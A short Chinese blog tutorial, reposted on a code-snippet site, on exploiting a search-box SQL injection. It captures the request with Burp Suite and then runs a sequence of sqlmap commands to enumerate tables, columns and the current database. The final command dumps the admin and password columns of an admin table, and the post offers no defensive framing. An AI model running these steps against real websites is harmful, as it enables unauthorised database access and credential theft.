首页 > 代码库 > burpsuit辅助sqlmap攻击
burpsuit辅助sqlmap攻击
今天发现一个搜索型注入,主要是利用网站的搜索引擎来注入的
例如下图所示:
在这个搜索 地方,我们可以输入2个字符验证他们是否能注入;
输入:‘ 出错
输入:% 不出错
满足以上2点,即可注入,我们要用到的工具为burpsuit,sqlmap
1:首先我们在搜索框里随便输入一个数字,我这里输入123,利用burpsuit把他抓包抓下来
2:然后把抓包抓下来的复制,然后粘贴到文本文档上去,保存到1.txt文件里
命令为:python sqlmap/sqlmap.py -r 1.txt
3:python sqlmap/sqlmap.py -r 1.txt --tables 猜表名
4:python sqlmap/sqlmap.py -r 1.txt --current-db 查看当前的数据库
5:python sqlmap/sqlmap.py -r 1.txt -T admin --columns 猜列名
6:python sqlmap/sqlmap.py -r 1.txt -D 指定数据库 -T admin -C admin,password --dump
综上,即可。
本文出自 “costin” 博客,请务必保留此出处http://brighttime.blog.51cto.com/12837169/1918433
burpsuit辅助sqlmap攻击
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。